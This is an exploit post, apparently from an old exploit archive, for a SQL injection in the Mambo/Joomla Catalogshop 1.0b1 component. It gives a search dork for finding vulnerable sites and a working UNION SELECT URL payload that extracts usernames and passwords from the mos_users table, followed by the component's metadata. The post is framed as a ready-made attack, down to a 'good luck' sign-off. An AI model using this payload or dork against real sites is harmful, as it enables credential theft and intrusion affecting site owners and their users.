Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability
2008-01-31 00:00:00#########################################################################
#
# joomla SQL Injection(com_catalogshop)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_catalogshop"
#
########################################################################
EXPLOIT :
index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
<name>catalogshop</name>
<creationDate>18.01.2005</creationDate>
<author>K.J. Strickland</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.pixelbunyip.com and www.mambomates.com</authorUrl>
<version>1.0 beta 1 ruff n ready</version>
<description>Catalogshop is a simple Mambo ecommerce component.</description>
#
Fixes
No fixesIn order to submit a new fix you need to be registered.